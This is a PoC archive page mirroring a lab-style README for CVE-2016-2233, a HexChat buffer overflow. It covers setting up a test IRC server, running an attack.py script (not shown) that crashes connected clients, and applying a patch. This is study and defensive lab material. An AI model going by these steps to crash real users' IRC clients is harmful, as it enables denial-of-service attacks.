Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1110 CNY

100%
Buy Us a Coffee

CVE-2016-2233 PoC — HexChat 缓冲区错误漏洞

Source
https://github.com/fath0218/CVE-2016-2233
Associated Vulnerability
Title:HexChat 缓冲区错误漏洞 (CVE-2016-2233)
Description:Stack-based buffer overflow in the inbound_cap_ls function in common/inbound.c in HexChat 2.10.2 allows remote IRC servers to cause a denial of service (crash) via a large number of options in a CAP LS message.
Description
This is an exploitation guide for CVE-2016-2233
Readme
# CVE-2016-2233

CVE-2016-2233 is a stack-based buffer overflow vulnerability related with a wide-used IRC software Hexchat. We build a IRC server and launch the attack on it to make all the client connected to the server crash. We exploited our attack on Ubuntu 12.04 using Python. We make a patch to fix the vulnerability and prove it indeed works by various tests.

## How to install Hexchat
System Environment: Ubuntu 12.04 seed

Python Version: 2.7.12

To set up the dependencies, the following command should be executed:

````clojure
sudo apt-get install gnome-common
sudo apt-get install libglib2.0-dev
sudo apt-get update
sudo apt-get install libgtk2.0-dev
````

Then extract the hexchat-2.10.2.zip file and enter the folder. Install the software using the following commands:
````clojure
./autogen.sh
./configure
Make
sudo make install
````
## How to Setup IRCD-IRC2 on Server

The following commands are used to install ircd-irc2:
````clojure
sudo apt install ircd-irc2
````
After the server is installed, use the following 2 commands to restart NetworkManager, and start the service. 
````clojure
sudo systemctl restart NetworkManager
sudo systemctl restart ircd-irc2
````

## How to Connect to Server

1. Find HexChat and double click to open
2. Set up nicknames
3. Press “Add” to add a network server
4. Name the server as “CVE Server” and press enter to confirm
5. Then press “Edit” to set up details such as IP address and Port number of the server
6. Edit the server in the pop-up window. 
7. Set the IP address to 10.0.2.6, and use default port 6667
8. Press “Connect” and enter a random name for the channel name
9. Repeat these steps for the other client and both clients should be in the same channel


## How to Exploit Attack

The exploit is run on the server, where the attacker occupies and listens to the port IRC is using, and spoof packets with a large payload to overflow the buffer on client’s side and make clients crash. 

1.client make connection to server
2.Stop the IRC service, and restart NetworkManager to enable the change
````clojure
sudo systemctl kill ircd-irc2
sudo systemctl restart NetworkManager
````
3.run the attack.py program on server


## How to patch

Replace the inbound.c file and reinstall the software using the following commands:
````clojure
./autogen.sh
./configure
Make
sudo make install
````
File Snapshot

 [4.0K]  /data/pocs/3caf727b6dbaf19a003aa70170e0800cd89c1353
├── [2.3K]  attack.py
├── [2.6M]  hexchat-2.10.2.tar.gz
├── [ 42K]  inbound.c
└── [2.3K]  README.md

0 directories, 4 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →